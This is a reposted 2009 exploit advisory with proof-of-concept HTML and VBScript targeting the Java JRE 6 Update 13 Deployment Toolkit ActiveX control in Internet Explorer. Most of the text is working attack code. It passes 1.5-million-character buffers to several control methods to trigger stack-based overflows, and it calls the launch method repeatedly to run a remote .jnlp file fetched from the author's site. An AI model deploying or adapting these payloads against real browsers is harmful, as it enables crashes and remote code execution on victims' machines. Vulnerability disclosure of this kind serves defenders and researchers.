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Java SE Runtime Environment - JRE 6 Update 13 Multiple Vulnerabilities
来源:http://www.shinnai.net/ 作者:shinnai 发布时间:2009-05-14  
Java SE Runtime Environment - JRE 6 Update 13 Multiple Vulnerabilities
url: http://java.sun.com/

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/

File: deploytk.dll
Des.: Deployment Toolkit
Url : http://javadl.sun.com/webapps/
Pac.: jre-6u13-windows-i586-p.exe

Mar.: RegKey Safe for Script: False
       RegKey Safe for Init: False
       Implements IObjectSafety: True
       IDisp Safe: Safe for untrusted: caller,data
       IPersist Safe: Safe for untrusted: caller,data

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP3 full patched, Internet Explorer 8

Detailed informations about the "launch (remote .jnlp execution)" will
be released on request.
<object classid='clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' id='test' height = 0 width = 0></object>

<select style="width: 404px" name="Pucca">
  <option value = "setInstallerType">setInstallerType</option>
  <option value = "setAdditionalPackages">setAdditionalPackages</option>
  <option value = "installLatestJRE">installLatestJRE</option>
  <option value = "compareVersion">compareVersion</option>
  <option value = "installJRE">installJRE</option>
  <option value = "getStaticCLSID">getStaticCLSID</option>
  <option value = "launch">launch (remote .jnlp execution)</option>
  <option value = "launch1">launch (stack-based BoF)</option>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
  On Error Resume Next
  If Pucca.Value = "setInstallerType" Then
   buff = String(1500000, "A")
   test.setInstallerType buff
  ElseIf Pucca.Value = "setAdditionalPackages" Then
   buff = String(1500000, "A")
   test.setAdditionalPackages buff
  ElseIf Pucca.Value = "installLatestJRE" Then
  ElseIf Pucca.Value = "compareVersion" Then
   buff = String(1500000, "A")
   test.compareVersion buff, buff
  ElseIf Pucca.Value = "installJRE" Then
   test.installJRE ""
  ElseIf Pucca.Value = "getStaticCLSID" Then
   buff = String(1500000, "A")
   test.getStaticCLSID buff
  ElseIf Pucca.Value = "launch" Then
   If(MsgBox(vbCrLf & "This exploit will launch the ForCicle.jnlp hosted on http://www.shinnai.net/" & _
      vbCrLf & "The file is trusted and just run a infinite loop which will lead into a resource consuption.          " & _
      vbCrLf & vbCrLf & "ARE YOU SURE YOU REALLY WANT TO RUN THE EXPLOIT?" & vbCrLf & vbCrLf, 1, "shinnai")=vbOk) Then
    buff = "http://www.shinnai.net/jre/ForCicle.jnlp"
    test.launch buff
    test.launch buff
    test.launch buff
    test.launch buff
    test.launch buff
   End if
  ElseIf Pucca.Value = "launch1" Then
   buff = String(1500000, "A")
   test.launch buff
   MsgBox Err.Description, vbCritical, "shinnai"
  End if
End Sub

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